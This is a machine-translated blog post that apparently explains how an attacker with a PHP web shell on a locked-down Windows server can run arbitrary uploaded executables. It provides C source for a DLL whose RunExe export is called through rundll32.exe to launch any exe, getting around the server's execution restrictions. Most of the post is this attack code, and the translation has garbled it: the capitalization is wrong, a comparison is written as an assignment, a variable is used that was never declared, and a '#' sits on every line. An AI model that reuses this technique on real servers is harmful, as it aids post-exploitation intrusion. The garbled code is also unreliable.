Execute exe using rundll32 in webshell

Abstract: For a web shell, the system permissions are well set, and common exe files do not have permission to be executed. The exe file that can be uploaded to the writable directory does not have the execution permission. Rundll32.exe is missing when the permission is set. If so, this code is written.

At the beginning of the test, PHP does not seem to have the right to execute the command. I was planning to use some of the overflow problems of php itself to overflow a low-privilege shell. Later, it was unexpectedly discovered that using the proc_open function could execute some internal commands, but the external commands and directories both had strict permission settings. In this case, only the external commands that can be used are tested. The rundll32.exe program is tested at the end of the test, and at last the response permission is insufficient. Write a dll and call rundll32 to execute any self-uploaded exe file. Maybe it's a small problem with windows permissions? After all, the identity of the exe indirectly executed by rundll32 is still the guest permission of the php shell, although the caller has changed-the real reason remains to be further studied.

#
/*************************************** **************************************** ******************
#
* When a server permission is very malformed, the system's exe cannot be executed, and the self-uploaded exe cannot be executed in a writable directory.
#
* The root cause is that they have missed the permission for the rundll32.exe file ......
#
* Code by wustyunshu ### hotmail.com,: 20
#
**************************************** **************************************** *****************/
#

#
# Include <stdio. h>
#
# Include <stdlib. h>
#
# Include <windows. h>
#

#
// Dll entry
#
Bool apientry DllMain (HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
#
{
#
Return true;
#
}
#

#
Void RunExe (HWND hwnd, HINSTANCE hinst, LPSTR sz1_line, int nCmdShow)
#
{
#
If (sz1_line = NULL)
#
{
#
Return;
#
}
#

#
DWORD dwNum = MultiByteToWideChar (CP_ACP, 0, sz1_line,-1, NULL, 0 );
#
Wchar_t * wsz1_line = new wchar_t [dwNum];
#
If (! WszCmdLine)
#
{
#
Return;
#
}
#
MultiByteToWideChar (CP_ACP, 0, sz1_line,-1, wsz1_line, dwNum );
#

#
Int argc;
#
LPWSTR * argv = CommandLineToArgvW (wsz1_line, & argc );
#

#
Wchar_t Cmd [256] = {0 };
#
Wchar_t Args [1024] = {0 };
#

#
// Strncpy (Cmd, argv [0], sizeof (Cmd)-1 );
#
Wcsncpy (Cmd, argv [0], sizeof (Cmd)-1 );
#
If (argc> 1)
#
{
#
For (int index = 1; index <argc; index ++)
#
{
#
Wcscat (Args, L ""), argv [index]);
#
}
#
}
#

#
STARTUPINFO si;
#
Memset (void *) & si, 0, sizeof (STARTUPINFOA ));
#
GetStartupInfoW (& si );
#

#
// New process input/output redirection
#
Si. cb = sizeof (si );
#
Si. dwFlags = STARTF_USESHOWWINDOW;
#
// Si. wShowWindow = SW_HIDE;
#

#
PROCESS_INFORMATION processInfo;
#
Memset (void *) & processInfo, 0, sizeof (PROCESS_INFORMATION ));
#

#
// Create a process
#
CreateProcessW (Cmd, Args, NULL, NULL, 1, 0, NULL, NULL, & si, & processInfo );
#

#
Sleep (60*1000 );
#
TerminateProcess (processInfo. hProcess, 0 );
#
}